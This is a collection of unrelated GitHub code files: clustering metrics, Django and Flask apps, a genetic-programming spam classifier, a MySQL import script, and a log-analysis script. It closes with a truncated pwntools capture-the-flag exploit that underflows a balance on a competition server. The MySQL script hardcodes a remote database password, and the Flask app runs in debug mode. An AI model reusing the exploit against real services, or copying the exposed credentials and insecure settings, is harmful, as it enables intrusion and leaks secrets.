Note that NAs are not counted.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> number_of_clusters(membership)\n 4\n \"\"\"\n membership = MembershipVector(membership)\n\n return membership.nunique()\n\n\ndef number_of_links(membership):\n r\"\"\"\n Number of pairwise links associated with a given clustering.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: Number of pairs of elements belonging to the same cluster. Note that clusters identified by NA values are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> number_of_links(membership)\n 5.0\n\n \"\"\"\n membership = MembershipVector(membership)\n\n return np.sum(comb(cluster_sizes(membership), 2))\n\n\ndef matching_rate(membership):\n r\"\"\"\n Compute the **matching rate** for a given clustering.\n\n Matching rate:\n This is the proportion of elements belonging to clusters of size at least 2.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: Number of pairs of elements belonging to the same cluster. Note that clusters identified by NA values are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> matching_rate(membership)\n 0.875\n \"\"\"\n membership = MembershipVector(membership)\n\n counts = membership.groupby(membership).count()\n\n return (counts * (counts > 1)).sum() / membership.count()\n\n\ndef average_cluster_size(membership):\n \"\"\"\n Compute the average cluster size.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n float: Average cluster size.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> average_cluster_size(membership)\n 2.0\n \"\"\"\n membership = MembershipVector(membership)\n\n return cluster_sizes(membership).mean()\n\n\ndef cluster_sizes(membership):\n r\"\"\"\n Compute the size of each cluster.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n Series: Series indexed by cluster identifier and with values corresponding to cluster size. Note that NA cluster identifiers are excluded.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_sizes(membership)\n 1 2\n 2 2\n 3 1\n 4 3\n dtype: int64\n \"\"\"\n membership = MembershipVector(membership)\n\n return membership.groupby(membership).count()\n\n\ndef cluster_sizes_distribution(membership):\n r\"\"\"\n Compute the cluster size distribution\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n Series: Pandas Series indexed by distinct cluster sizes and with values corresponding to the number of clusters of that size.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_sizes_distribution(membership)\n 1 1\n 2 2\n 3 1\n dtype: int64\n \"\"\"\n membership = MembershipVector(membership)\n\n cs = cluster_sizes(membership)\n return cs.groupby(cs).count()\n\n\ndef cluster_hill_number(membership, alpha=1):\n r\"\"\"\n Compute Hill number of a given order.\n\n Hill numbers:\n The Hill number of order :math:`\\alpha \\geq 0` of a given probability distribution :math:`p_i`, :math:`i =0,1,2, \\dots`, is defined as\n\n .. 
math::\n\n H_\\alpha = \\left(\\sum_{i} p_i^{\\alpha} \\right)^{1/(1-\\alpha)}\n\n and continually extended at :math:`\\alpha =0, 1`. Here, we let :math:`p_i` be the proportion of clusters of size :math:`i`.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n alpha (int, optional): Order of the Hill Number. Defaults to 1.\n\n Returns:\n float: Hill number of order `alpha` for the given clustering.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> cluster_hill_number(membership, alpha=0)\n 3\n\n >>> cluster_hill_number(membership, alpha=1)\n 2.82842712474619\n\n >>> cluster_hill_number(membership, alpha=np.Inf)\n 2.0\n \"\"\"\n membership = MembershipVector(membership)\n\n cs_dist = cluster_sizes_distribution(membership)\n probs = cs_dist / np.sum(cs_dist)\n probs = probs[probs > 0]\n\n if alpha == 0:\n return len(probs)\n if alpha == 1:\n return np.exp(-np.sum(probs * np.log(probs)))\n if alpha == np.Inf:\n return 1 / np.max(probs)\n else:\n return np.sum(probs**alpha) ** (1 / (1 - alpha))\n\n\ndef homonymy_rate(membership, names):\n r\"\"\"\n Compute the homonymy rate of a given clustering with a set of associated names.\n\n Homonymy rate:\n The homonymy rate is the proportion of clusters that share a name with another cluster.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Series indexed by cluster elements and with values corresponding to the associated name. Note that the index of `membership` should be included in the index of `names`.\n\n Returns:\n float: homonymy rate\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> names = pd.Series(index=[1,2,3,4,5,6,7,8], data=[\"n1\", \"n2\", \"n3\", \"n4\", \"n3\", \"n1\", \"n2\", \"n8\"])\n >>> homonymy_rate(membership, names)\n 0.5\n \"\"\"\n membership = MembershipVector(membership)\n assert isinstance(names, pd.Series)\n assert all(membership.index.isin(names.index))\n\n df = pd.concat(\n {\"membership\": membership, \"name\": names},\n axis=1,\n join=\"inner\",\n copy=False,\n )\n\n names_count = df.name.groupby(df.name).count().reset_index(name=\"total_count\")\n name_count_per_cluster = df.groupby([\"name\", \"membership\"]).size().reset_index(name=\"cluster_count\")\n merged = name_count_per_cluster.merge(\n names_count,\n on=\"name\",\n copy=False,\n validate=\"m:1\",\n )\n merged[\"diff\"] = merged.total_count - merged.cluster_count\n\n return (merged.groupby(\"membership\").agg({\"diff\": \"max\"}) > 0).mean().values[0]\n\n\ndef name_variation_rate(membership, names):\n r\"\"\"\n Compute the name variation rate of a given clustering with a set of associated names.\n\n Name variation rate:\n The name variation rate is the proportion of clusters with name variation within.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Series indexed by cluster elements and with values corresponding to the associated name. 
Note that the index of `names` should exactly match the index of `membership`.\n\n Returns:\n float: Name variation rate.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> names = pd.Series(index=[1,2,3,4,5,6,7,8], data=[\"n1\", \"n2\", \"n3\", \"n4\", \"n3\", \"n1\", \"n2\", \"n8\"])\n >>> name_variation_rate(membership, names)\n 0.5\n \"\"\"\n membership = MembershipVector(membership)\n assert isinstance(names, pd.Series)\n assert all(membership.index.isin(names.index))\n\n joined = pd.concat(\n {\"membership\": membership, \"name\": names},\n axis=1,\n join=\"inner\",\n copy=False,\n )\n\n return (joined.groupby(\"membership\").nunique() > 1).mean().values[0]\n","repo_name":"Valires/er-evaluation","sub_path":"er_evaluation/summary/_summary.py","file_name":"_summary.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"72570244951","text":"from flask import Flask, make_response, request, render_template, jsonify\nfrom flask_bootstrap import Bootstrap\nfrom flask import Markup\nimport flask\nimport io\nimport csv\nimport pandas as pd\nimport numpy as np\nimport os\nfrom ols_summary import train_model as ols_tm\n\ndef print_head(df):\n head = df.head().to_html()\n return Markup(head)\n\napp = Flask(__name__)\n\n@app.route('/upload.html')\ndef upload():\n return flask.render_template('upload.html')\n\n@app.route('/head', methods=[\"POST\"])\ndef head():\n f = request.files['data_file']\n if not f:\n return \"No file\"\n df = pd.read_csv(f)\n df.to_csv('../data/df.csv')\n head = print_head(df)\n columns = list(df.columns)\n\n return flask.render_template(\n 'head.html',\n head = head,\n columns = columns\n )\n\n@app.route('/select_cols', methods=[\"POST\", \"GET\"])\ndef select_cols():\n # if request.method == 'POST':\n df = pd.read_csv('../data/df.csv')\n all_cols = list(df.columns)\n print('This is all_cols:', all_cols)\n # for col in cols:\n form_results = request.form\n print('request.form: ', request.form)\n cols_to_keep = list(form_results.keys())\n x_cols = cols_to_keep.copy()\n print('This is cols_to_keep:', cols_to_keep)\n print('This is x_cols: ', x_cols)\n for k, v in form_results.items():\n print('This is k', k)\n print('This is v', v)\n if v == 'y':\n x_cols.remove(k)\n y_col = k\n print('This is y_col', y_col)\n print('Now here is cols_to_keep', cols_to_keep)\n print('Now here is x_cols', x_cols)\n # print('This is again y_col', y_col)\n cols_to_drop = set(all_cols) - set(cols_to_keep)\n new_df = df.drop(cols_to_drop, axis=1)\n print('Here is new_df', new_df)\n df_X = new_df.drop(y_col, axis=1)\n head = print_head(new_df)\n new_df.to_csv('../data/df_reduced_cols.csv')\n columns = list(new_df.columns)\n X = df_X\n y = df[y_col]\n ols_results = ols_tm(X.astype(float), y)\n ols_summary = Markup(ols_results)\n\n return flask.render_template(\n 'cols4.html',\n head = head,\n columns = columns,\n ols_summary = ols_summary\n )\n\n # return flask.render_template(\n # 'cols2.html'\n # )\n\n@app.route('/rename_cols', methods=[\"POST\"])\ndef rename_cols():\n return flask.render_template(\"hi there!\")\n\n\n@app.route('/ols', methods=[\"POST\"])\ndef ols():\n pass\n\n@app.route('/process', methods=['POST', 'GET'])\ndef process():\n\n if request.method=='POST':\n\n df = pd.read_csv('../data/df_reduced_cols.csv')\n df.reset_index(drop=True)\n all_cols = list(df.columns)\n print('Here is all_cols:', all_cols)\n # for col in cols:\n form_results 
= request.form\n print('request.form: ', request.form)\n cols_to_keep = list(form_results.keys())\n x_cols = cols_to_keep.copy()\n print('Here is cols_to_keep:', cols_to_keep)\n print('Here is x_cols: ', x_cols)\n for k, v in form_results.items():\n print('k:', k)\n print('v:', v)\n df[k] = v\n\n print('df.columns', df.columns)\n head = print_head(df)\n df.to_csv('../data/df_reduced_cols.csv')\n columns = list(df.columns)\n\n return jsonify({'test' : columns})\n\n elif request.method=='GET':\n return \"OK this is a GET method\"\n else:\n return(\"ok\")\n\nif __name__ == \"__main__\":\n Bootstrap(app)\n app.run(host='0.0.0.0', port=8080, debug=True, use_reloader=False)\n","repo_name":"howardvickers/no-code-ml","sub_path":"src/old_app.py","file_name":"old_app.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18982952017","text":"from django.db import models\nfrom ajaximage.fields import AjaxImageField\nfrom common.models import MultiImageMeta, Spec\n\n\nclass CommercialProjectGallerySlide(models.Model, metaclass=MultiImageMeta):\n \"\"\"\n Слайд галереи коммерческого проекта\n \"\"\"\n\n WIDTH = 1440\n HEIGHT = 595\n\n title = models.CharField(verbose_name=\"Заголовок\", max_length=100, null=True, blank=True)\n subtitle = models.CharField(verbose_name=\"Подзаголовок\", max_length=300, null=True, blank=True)\n video = models.FileField(verbose_name=\"Видео (деск.)\", blank=True, upload_to=\"cpp/pgs/v\")\n video_mobile = models.FileField(verbose_name=\"Видео (моб.)\", blank=True, upload_to=\"cpp/pgs/vm\")\n\n image = AjaxImageField(\n verbose_name=\"Изображение\",\n upload_to=\"p/gallery\",\n blank=True,\n null=True,\n help_text=f\"шир. - {WIDTH}, выс. 
- {HEIGHT}\",\n )\n\n commercial_project_page = models.ForeignKey(\n verbose_name=\"Страница коммерческого проекта\",\n to=\"commercial_project_page.CommercialProjectPage\",\n on_delete=models.CASCADE,\n related_name=\"gallery_slides\",\n )\n\n order = models.PositiveSmallIntegerField(verbose_name=\"Порядок\", default=0, db_index=True)\n\n image_map = {\n \"image_display\": Spec(source=\"image\", width=WIDTH, height=HEIGHT),\n \"image_preview\": Spec(source=\"image\", width=WIDTH, height=HEIGHT, blur=True),\n }\n\n class Meta:\n verbose_name = \"Слайд галереи\"\n verbose_name_plural = \"Слайды галереи\"\n ordering = (\"order\",)\n\n def __str__(self):\n return f\"{self._meta.verbose_name} #{self.order}\"\n","repo_name":"r2r2/strana_backend","sub_path":"backend/commercial_project_page/models/commercial_project_gallery_slide.py","file_name":"commercial_project_gallery_slide.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14374484177","text":"from django import forms\nfrom ckeditor.fields import RichTextFormField\n\nclass FormularioComprarEntradas(forms.Form):\n OPCIONES_METODO_PAGO = [('efectivo', 'Efectivo'), ('mercadopago', 'MercadoPago')]\n\n nombre = forms.CharField(max_length=20, widget=forms.TextInput(attrs={'placeholder': 'Ingrese su nombre'}))\n mail = forms.CharField(max_length=40, widget=forms.TextInput(attrs={'placeholder': 'Ingrese su mail'}))\n cant_entradas = forms.IntegerField()\n metodo_pago = forms.ChoiceField(choices=OPCIONES_METODO_PAGO)\n opinion = forms.Media()\n imagen = forms.ImageField()\n\nclass ModificarCompra(forms.Form):\n nombre = forms.CharField(max_length=20,widget=forms.TextInput(attrs={'placeholder': 'Inrese su nombre'}))\n mail = forms.CharField(max_length=40,widget=forms.TextInput(attrs={'placeholder': 'Inrese su mail'}))\n cant_entradas = forms.IntegerField()\n opinion = forms.Media()\n","repo_name":"MateoLarrosa/Janerfest-entregaCoder3","sub_path":"entradas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21263746527","text":"numtxt = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze',\n 'doze', 'treze', 'catorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\n\ncores = dict(reset='\\033[m',\n red='\\033[31m',\n blue='\\033[34m',\n negrito='\\033[1m',\n neg_ita='\\033[1;3m'\n )\n\nwhile True:\n num = int(input('Digite um número entre 0 e 20: ').strip())\n while True:\n if 0 <= num <= 20:\n break\n num = int(input('Valor inválido! Digite um número entre 0 e 20: '))\n\n print(f'\\n{cores[\"negrito\"]}O número {num} por extenso é {cores[\"neg_ita\"]}{numtxt[num]}{cores[\"reset\"]}.')\n\n esc = input('\\nQuer continuar? (Sim / Não) ').strip().upper()[0]\n\n while True:\n if esc not in 'SN':\n print('')\n esc = input(f'{cores[\"red\"]}Valores incorretos! 
Digite novamente (Sim / Não): {cores[\"reset\"]}').strip().upper()[0]\n else:\n break\n print('')\n\n if esc == 'N':\n break\n\nprint('--- Fim da execução ---')\n","repo_name":"Henrique-Sc/CursoemVideo-Python","sub_path":"Exercicios/ex072.py","file_name":"ex072.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38738642883","text":"import warnings\nwarnings.simplefilter(\"ignore\")\n\nimport operator\nimport itertools\n\nfrom deap import algorithms\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nfrom deap import gp\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\n# defined a new primitive set for strongly typed GP\npset = gp.PrimitiveSetTyped(\"MAIN\", itertools.repeat(float, 57), bool, \"IN\")\n# określamy zbór prymitywów\n# boolean operators\npset.addPrimitive(operator.and_, [bool, bool], bool)\npset.addPrimitive(operator.or_, [bool, bool], bool)\npset.addPrimitive(operator.not_, [bool], bool)\n\npset.addPrimitive(operator.add, [float, float], float)\npset.addPrimitive(operator.sub, [float, float], float)\npset.addPrimitive(operator.mul, [float, float], float)\n\n# logic operators\n# Define a new if-then-else function\n#tu sami definiujemy prymityw\ndef if_then_else(input, output1, output2):\n if input:\n return output1\n else:\n return output2\n\npset.addPrimitive(operator.lt, [float, float], bool)\npset.addPrimitive(operator.eq, [float, float], bool)\npset.addPrimitive(if_then_else, [bool, float, float], float)\n\npset.addTerminal(False, bool)\npset.addTerminal(True, bool)\n\n# solution encoding\n# jaka bedzie reprezentacja osobnika, jak będzie enkodowany osobnik\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", gp.PrimitiveTree, fitness=creator.FitnessMax)\n# to co podajemy tej fcji to odpowiednik wskaźnika na funkcję w c (gp.PrimitiveTree)\n\n#fit function\n# określamy funkcję jakosci, ważny będzie dla nas jak dany osobnik rozpoznaje pocztę\n# funkcja przyjmuje jako argument osobnika\n\ndef evalSpambase(individual):\n # Transform the tree expression in a callable function\n func = toolbox.compile(expr=individual)\n #powyżej osobnik z reprezentacji drzewiastej jest przekształcany na kod python\n #funkcja reprezentuje nasze drzewko\n result = sum(bool(func(*mail)) is bool(target) for mail, target in zip(emails_train, targets_train))\n #czy wartość boolowska zwrócona przez drzewko jest taka jak target\n #powstaje lista wypełniona wartościami true lub folse w zależnosci od tego czy są takie same czy różne\n #ilość poprawnychh i niepoprawnych jest zliczana\n return result,\n\n# GP parameters\n#określamy parametry algorytmu\ntoolbox = base.Toolbox()\n\ntoolbox.register(\"expr\", gp.genHalfAndHalf, pset=pset, min_=1, max_=5)#zbiór prymitywów, minimalna głebokość, maksymalna głębokość\ntoolbox.register(\"individual\", tools.initIterate, creator.Individual, toolbox.expr)\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\ntoolbox.register(\"compile\", gp.compile, pset=pset)\n\ntoolbox.register(\"evaluate\", evalSpambase)#podpięcie naszej funkcji oceniajacej\n\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\ntoolbox.register(\"mate\", gp.cxOnePoint)\ntoolbox.register(\"expr_mut\", gp.genFull, min_=0, max_=2)\ntoolbox.register(\"mutate\", gp.mutUniform, expr=toolbox.expr_mut, pset=pset)\n\nimport multiprocessing\n\npool = 
multiprocessing.Pool()\ntoolbox.register(\"map\", pool.map)\n\n# set population size\npop = toolbox.population(n=80)\nhof = tools.HallOfFame(5)#dodatkowa pamięc w której zapisujemy jaki był najlepszy osobnik do tej pory\n\nhistory = tools.Statistics(lambda ind: ind.fitness.values)#zbieramy do historii statystykę populacji\nhistory.register(\"max_fit\", np.max)#referencje do metod, tutaj moglibyśmy podpiąć swoje funkcje\nhistory.register(\"mean_fit\", np.mean)\n\n#prawdopodobieństwo krzyżowania, mutacj, ilosć iteracji\npop, history = algorithms.eaSimple(pop, toolbox, 0.2, 0.1, 200, history, halloffame=hof)\n#jeśleli w max_fit i mean_fit dostajemy taki sam wynik to znaczy że jeden osobnik zdominował całą populację\nprint(\"Learned spam detection rule: \", hof[-1])\n\n#jednocześnie:\n#ekstrakcja cech - wzięcie pod uwagę pewnego podzbioru cech\n#nieliniowa transformacja cech\n#zbudowany klasyfikator\n\nplt.figure(figsize=(11, 4))\nplots = plt.plot(history.select('max_fit'),'c-', history.select('mean_fit'), 'b-')\nplt.legend(plots, ('Max fitness', 'Mean fitness'), frameon=True)\nplt.ylabel('Fitness'); plt.xlabel('Iterations'); plt.grid()\n#rysujemy proces ewolucyjny","repo_name":"mijapa/FuzzyProject","sub_path":"fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4293800826","text":"from django import forms\nfrom .models import Product\n\n# 問 2-3-1 RegisterForm クラスを作成しましょう。引数には ModelForm を指定しましょう。\nclass RegisterForm(forms.ModelForm):\n # 問 2-3-2 Meta クラスを作成しましょう。\n class Meta:\n # 問 2-3-2-1 model には Product テーブルを指定しましょう。\n model = Product\n # 問 2-3-2-2 fields には product_name、price、product_detail、category、img を指定しましょう。\n fields = ('product_name','price','product_detail','category','img')\n # 問 2-3-2-3 labels には下記を指定しましょう。\n labels = {\n 'product_name':'商品名',\n 'price':'価格',\n 'product_detail':'商品詳細',\n 'category':'カテゴリー',\n 'img':'商品画像',\n }\n # 問 2-3-3 init 関数を作成しましょう。\n def __init__(self,*args,**kargs):\n # 問 2-3-3-1 super().__init__() として、*args と **kwargs を継承しましょう。\n super().__init__(*args,**kargs)\n # 問 2-3-3-2 self.label_suffix に '' を指定して、ラベル名の横にあるコロンを非表示にしましょう。\n self.label_suffix = ''\n # 問 2-3-3-3 for 文で self.fields.values() を回しましょう。\n for field in self.fields.values():\n # 問 2-3-3-4 それぞれの field の placeholder と class を変更しましょう。placeholder には field.label、class には form-control を指定しましょう。\n field.widget.attrs['placeholder'] = field.label\n field.widget.attrs['class'] = 'form-control'\n# 問 4-4-1 SearchProductForm クラスを作成しましょう。引数には ModelForm を指定しましょう。\n\n # 問 4-4-2 Meta クラスを作成しましょう。\n\n # 問 4-4-3 model に Product、fields に category、labels に {'category':'カテゴリー'} を指定しましょう。\n\n # 問 4-4-4 init 関数を作成しましょう。\n\n # 問 4-4-5 super().__init__() として、*args と **kwargs を継承しましょう。\n\n # 問 4-4-6 self.label_suffix を 空で指定しましょう。\n\n # 問 4-4-7 self.fields.values() を field 変数として for 文で回しましょう。\n\n # 問 4-4-8 class に form-control を指定しましょう。\n\n # 問 4-4-9 field.required に False を指定しましょう。\n","repo_name":"Philomoon/kinocollege_friends","sub_path":"web_app10/ec_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14004792190","text":"import os\nimport pymysql\nimport xlrd\n\ndef judgec(lst):\n if lst[2] - lst[1] == 1 and lst[1] - lst[0] == 0:\n return True\n return False\n\ndef judgel(lst):\n for i in list(range(len(lst)))[:-2]:\n isc = judgec(lst[i:i+3])\n if 
isc:\n return True\n return False\n\n_path = r'xlsxs/慢支.xlsx'\n\nhost = '115.159.193.122'\nport = 3306\nusername = 'root'\npassword = 'hkxx@206'\ndb = 'cola'\ncharset = 'utf8'\n\nconn = pymysql.connect(host=host,\n port=port,\n user=username,\n password=password,\n db=db,\n charset=charset,\n cursorclass=pymysql.cursors.DictCursor)\n\ncursor = conn.cursor()\n\ninsert_sql = 'insert into diseases(disease, question, answer) values(%s, %s, %s)'\n\nwbook = xlrd.open_workbook(_path)\nsheetname = wbook.sheet_names()[0]\nsheetcont = wbook.sheet_by_name(sheetname)\n\nindex_0 = [0]\nindex_s = []\ncount = 0\nfor i in list(range(sheetcont.nrows))[1:]:\n this_line = sheetcont.row_values(i)\n line_0 = this_line[0]\n if line_0.strip() == '':\n index_0.append(0)\n else:\n index_0.append(1)\n index_s.append(i)\n count += 1\n# print(count)\n# print(index_0)\n# print(len(index_0))\n# print(len(index_s))\n# print(index_s)\n# print(judgel(index_s))\nindex_s.append(sheetcont.nrows)\n# print(len(index_s))\n# print(sheetcont.nrows)\n\nfor i in list(range(len(index_s)))[1:-1]:\n cno = 0\n ind = 0\n data = []\n data.append('慢支')\n\n # print(i, end=' ')\n if i < len(index_s) - 1:\n if index_s[i + 1] - index_s[i] == 1:\n continue\n\n if index_s[i] - index_s[i - 1] == 1:\n ind = i - 1\n cno = 2\n else:\n ind = i\n cno = 1\n\n # print('ind :', ind)\n this_question = ''\n # print(1, ind, index_s[ind], index_s[ind] + cno, end=' ')\n for j in list(range(index_s[ind], index_s[ind] + cno)):\n this_line = sheetcont.row_values(j)\n cont = this_line[0].strip().replace('\\n', '')\n cont = cont.replace(' ', '')\n this_question += cont\n data.append(this_question)\n # print(j)\n\n this_answer = ''\n # print(2, ind, len(index_s), index_s[ind], index_s[ind + 1], sheetcont.nrows, end=' ')\n for j in list(range(index_s[ind], index_s[ind + 1])):\n this_line = sheetcont.row_values(j)\n cont = this_line[1].strip().replace('\\n', '')\n cont = cont.replace(' ', '')\n this_answer += cont\n data.append(this_answer)\n # print(j)\n\n # print(i, end=' ')\n # print(data)\n\n cursor.execute(insert_sql, data)\n print('插入第', repr(cursor.lastrowid), '条数据', 'Done!!!!!!!!!')\n conn.commit()\n\n\n\n","repo_name":"waspart/python","sub_path":"excelprocess/diseaseinsert2.py","file_name":"diseaseinsert2.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13546537151","text":"#! /usr/bin/python\n#Author: Tony Allard\n#Date: 07 October 2016\n#Description: A Python script for extracting the number of dead ends encountered by the planner.\n#Extracts data to CSV file, including averages.\n\nimport sys\nimport os\nimport argparse\nimport re\nimport AnalysisCommon\n\nDEAD_END_COUNT_DELIM = \"#; Search encountered\"\nDEAD_END_COUNT_TERM_DELIM = \" dead ends\"\nEHC_SEARCH_STARTING = \"Initial heuristic = \"\nBFS_SEARCH_STARTING = \"Resorting to best-first search\"\nINITIAL_STATE_DEADENDS = \"#; Initial State - dead ends encountered:\"\n\ndef extractDeadEnds(log):\n\tfor line in log:\n\t\tif DEAD_END_COUNT_DELIM in line:\n\t\t\tdeadEndCount = re.findall(r'\\d+', line)\n\t\t\treturn int(deadEndCount[0])\n\treturn None\n\ndef extractInitialStateDeadEnds(log):\n\tfor line in log:\n\t\tif INITIAL_STATE_DEADENDS in line:\n\t\t\tvalue = line[line.index(INITIAL_STATE_DEADENDS) + len(INITIAL_STATE_DEADENDS):]\n\t\t\tstates = re.findall(r'\\d+', value)\n\t\t\tif len(states) != 1:\n\t\t\t\traise RuntimeError(\"Error! 
Multiple dead end counts found: %s\"%states)\n\t\t\treturn int(states[0])\n\treturn None\n\ndef extractDeadEndsManually(logBuffer):\n\tstartIdx = -1\n\ti = 0\n\tfor line in logBuffer:\n\t\tif line.find(AnalysisCommon.SEARCH_BEGIN_DELIM) >= 0:\n\t\t\tstartIdx = i\n\t\t\tbreak\n\t\ti+=1\n\tif startIdx == -1:\n\t\treturn None\n\n\tdeadEnds = 0\n\tfor x in range(startIdx+1, len(logBuffer)):\n\t\tdeadEnds += AnalysisCommon.filterBranchString(logBuffer[x]).count('d')\n\t\tif any(substring in logBuffer[x] for substring in AnalysisCommon.TERMINATE_FLAGS):\n\t\t\tbreak\t\n\treturn int(deadEnds)\n\ndef main(args):\n\tparser = argparse.ArgumentParser(description='A Python script for extracting the number of dead ends encountered by the planner.')\n\tparser.add_argument('path',\n\t metavar='/path/to/planner/logs/',\n\t\t\t\t\t\ttype=str,\n\t\t help='the location of the logs for a specific planner')\n\targs = parser.parse_args()\n\t\t \n\tif not os.path.isdir(args.path):\n\t\tprint(\"Error: %s is not a valid directory\"%args.path)\n\t\tsys.exit(-1)\n\t\n\tinputPath = args.path\n\n\tlogStructure = AnalysisCommon.getLogStructure(inputPath)\n\n\tfor planner in logStructure:\n\t\tprint (planner)\n\t\tif planner == \"lpg-td\":\n\t\t\tcontinue\n\t\tfor problemDomain in logStructure[planner]:\n\t\t\tlogPath = logStructure[planner][problemDomain]\n\n\t\t\tdeadEnds = 0\n\t\t\tinitialState_deadEnds = 0\n\t\t\tprobsConsidered = 0 \n\n\t\t\tfor filename in os.listdir(logPath):\n\t\t\t\tfullQualified = os.path.join(logPath, filename)\n\t\t\t\tbuffer = AnalysisCommon.bufferCompressedFile(fullQualified)\n\t\t\t\tif buffer == -1:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tif not AnalysisCommon.isProblemLog(filename, buffer):\n\t\t\t\t\tcontinue\n\t\t\t\ttmpDeadEnds = extractDeadEndsManually(buffer)\n\t\t\t\tif tmpDeadEnds is not None:\n\t\t\t\t\tdeadEnds += tmpDeadEnds\n\t\t\t\ttmpInitStateDeadEnds = extractInitialStateDeadEnds(buffer)\n\t\t\t\tif tmpInitStateDeadEnds is not None:\n\t\t\t\t\tinitialState_deadEnds += tmpInitStateDeadEnds\n\t\t\t\t\n\t\t\t\tprobsConsidered += 1\n\t\t\t\t\n\t\t\tprint (\"\\t%s\"%problemDomain)\n\t\t\tprint (\"\\t\\tAvg Dead Ends: %f\"%(deadEnds/probsConsidered))\n\t\t\tprint (\"\\t\\tAvg Initial State Dead Ends: %f\"%(initialState_deadEnds/probsConsidered))\n\n#Run Main Function\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"tonyallard/CEIScripts","sub_path":"problem-analysis/ExtractDeadEnds.py","file_name":"ExtractDeadEnds.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29560249713","text":"import re\nfrom pwn import * # type: ignore\nfrom time import sleep\n\ncontext(arch=\"amd64\", os=\"linux\")\n# context.log_level = \"DEBUG\"\n\nRECV_DELAY = 1\nRECV_SIZE = 32768\n\nlibc = ELF(\"libc.so.6\")\n\n# readelf -Ws libc.so.6 | grep ' puts\\W'\n\n\ndef parse_steps(fname: str):\n with open(fname, \"r\") as file:\n fc = file.read().split(\"\\n\")\n\n # filter out comment lines\n fc = filter(lambda x: len(x) != 0 and x[0] != \"#\", fc)\n fc = \"\\n\".join(fc)\n\n # plus signs = inline newlines\n return fc.replace(\"+\", \"\\n\")\n\n\nr = remote(\"chal.pctf.competitivecyber.club\", 4444)\n\n\ndef recv():\n sleep(RECV_DELAY)\n return r.recv(RECV_SIZE).decode()\n\n\n# get balance to underflow\ntip_spam_txt = parse_steps(\"1_spam_tips.txt\")\nr.send(bytes(tip_spam_txt, \"utf-8\"))\nrecv()\n\n# buy the book\nr.send(b\"2\\n3\\ny\\n\")\nsleep(RECV_DELAY)\nres = recv()\n\n# get 
